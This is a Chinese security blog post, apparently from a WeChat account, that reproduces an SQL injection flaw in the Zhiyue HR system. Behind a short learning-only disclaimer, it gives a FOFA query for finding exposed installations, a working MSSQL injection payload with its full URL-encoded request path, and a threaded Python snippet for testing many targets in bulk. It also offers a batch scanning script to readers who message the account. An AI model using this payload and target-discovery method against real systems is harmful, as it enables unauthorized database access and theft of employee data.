关注本公众号,长期推送漏洞文章
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
简介
智跃HR系统以“功能全面、稳定、安全、便捷”为宗旨,以“一套软件完成企业人力资源管理各项功能”为目的而设计,其中包含了企业人事部门所需要的各种管理方案,从员工入职到员工离职,都能在本系统中统一管理。
智跃HR系统存在SQL注入漏洞,黑客可通过该漏洞在数据库执行任意语句,以达到数据泄露。
资产
fofa:body="ZY.LOGO.64.png"
漏洞复现POC
123的md5值:202cb962ac59075b964b07152d234b70
原Payload:
(SELECT CHAR(103)+CHAR(87)+CHAR(114)+CHAR(112) WHERE 1669=1669 AND 6492 IN (select SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123')),3,32)))+'
可以看到进行了md5(123)的操作来证明是否被数据库执行
那么我们拼接url,进行测试
/resource/utils/GenerateEntityFromTable.aspx?t=1%27%2B(SELECT%20CHAR(103)%2BCHAR(87)%2BCHAR(114)%2BCHAR(112)%20WHERE%201669%3D1669%20AND%206492%20IN%20(select%20SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27123%27)),3,32)))%2B%27
漏洞复现
直接拼接URL即可:
知道原理后开始编写python脚本
通过线程池达到批量线程测试
with concurrent.futures.ThreadPoolExecutor(max_workers=8) as executor:
executor.map(check_vulnerability, targets)
在max_workers后面填写线程数量,数量越大,线程越快。
批量测试脚本:
不会写poc脚本的师傅可以将本POC检测框架下载下来自己进行简单修改就可以了
获取方式:关注本公众号,后台回复“1106”获取
后台回复“交流群”获取技术交流群链接
往期精彩:
【最新漏洞】易宝OA ExecuteSqlForSingle SQL注入漏洞[附批量脚本]
原文始发于微信公众号(知攻善防实验室):[漏洞复现]智跃人力资源管理系统存在SQL注入漏洞复现-附批量脚本
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论